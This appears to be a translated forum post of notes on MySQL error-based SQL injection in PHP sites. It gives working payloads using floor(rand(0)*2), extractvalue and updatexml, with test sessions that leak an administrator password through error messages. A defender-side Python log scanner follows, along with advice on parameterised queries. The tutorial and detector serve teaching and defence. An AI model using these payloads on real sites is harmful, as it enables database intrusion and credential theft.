Posting a few of my old notes. When MySQL executes a statement it throws an error message, and websites built on the php+mysql stack often display that error text on the page, so specific data can be retrieved with the three kinds of constructed statements below.

Actual test environment:
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin          |
| article        |
+----------------+

mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type             | Null | Key | Default | Extra          |
+-------+------------------+------+-----+---------+----------------+
| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| user  | varchar(50)      | NO   |     | NULL    |                |
| pass  | varchar(50)      | NO   |     | NULL    |                |
+-------+------------------+------+-----+---------+----------------+

mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field   | Type             | Null | Key | Default | Extra          |
+---------+------------------+------+-----+---------+----------------+
| id      | int(10) unsigned | NO   | PRI | NULL    | auto_increment |
| title   | varchar(50)      | NO   |     | NULL    |                |
| content | varchar(50)      | NO   |     | NULL    |                |
+---------+------------------+------+-----+---------+----------------+

1. Error via floor()
The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
Example:
First run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+
If the id parameter is injectable, the following statement produces the error:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
As you can see, the MySQL version was successfully leaked in the error. To retrieve other data, replace the expression at the position of version() with the desired subquery.
For example, to retrieve the administrator's username and password:
Method 1:

mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id = 1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method 2:

mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2. ExtractValue
Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3. UpdateXml
Test statement:

and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
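As an added defender-side example, not code from the original post: the three techniques above leave recognisable shapes in query logs, and the MySQL error text that makes them work should never be echoed to a browser. The Python below (sample log lines constructed to mirror the transcripts above) tags both the payload shapes and the leaking error messages, so the same logic can run over a real general query log or application error log.

```python
import re

# Constructed sample lines (not from the original post), modelled on the transcripts
# above: queries as a PHP app would send them, interleaved with the MySQL error text
# the application echoed back to the browser.
SAMPLE_LOG = [
    "select * from article where id = 1",
    "select * from article where id = 1 and (select 1 from (select count(*),"
    "concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)",
    "ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "select * from article where id = 1 and extractvalue(1, concat(0x5c,"
    "(select pass from admin limit 1)))",
    "ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,"
    "(select pass from admin limit 1),0x5e24),1))",
    "ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'",
]

# Payload shapes: floor(rand(0)*2) only triggers the 1062 error together with
# GROUP BY, so both must be present; extractvalue/updatexml are flagged on their own.
FLOOR_RAND = re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I)
GROUP_BY = re.compile(r"\bgroup\s+by\b", re.I)
XPATH_FUNCS = re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I)
# Error text that must never reach a browser: the extracted data rides inside it.
DUP_GROUP_KEY = re.compile(r"ERROR 1062 .*Duplicate entry '.*' for key 'group_key'")
XPATH_ERROR = re.compile(r"ERROR 1105 .*XPATH syntax error: '.*'")


def classify(line):
    """Tags that apply to one log line; an empty list means it looks benign."""
    tags = []
    if FLOOR_RAND.search(line) and GROUP_BY.search(line):
        tags.append("payload:floor-rand-groupby")
    m = XPATH_FUNCS.search(line)
    if m:
        tags.append("payload:" + m.group(1).lower())
    if DUP_GROUP_KEY.search(line):
        tags.append("leak:error-1062-group_key")
    if XPATH_ERROR.search(line):
        tags.append("leak:error-1105-xpath")
    return tags


def scan(lines):
    """(1-based line number, tags) for every line that is not benign."""
    hits = [(n, classify(l)) for n, l in enumerate(lines, start=1)]
    return [(n, tags) for n, tags in hits if tags]
```

A "leak:" tag in production logs means the application is returning raw MySQL errors to the client; the fix on the PHP side is parameterised queries plus a generic error page, with display_errors off.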
Thanks all, and thanks to the foreign guys.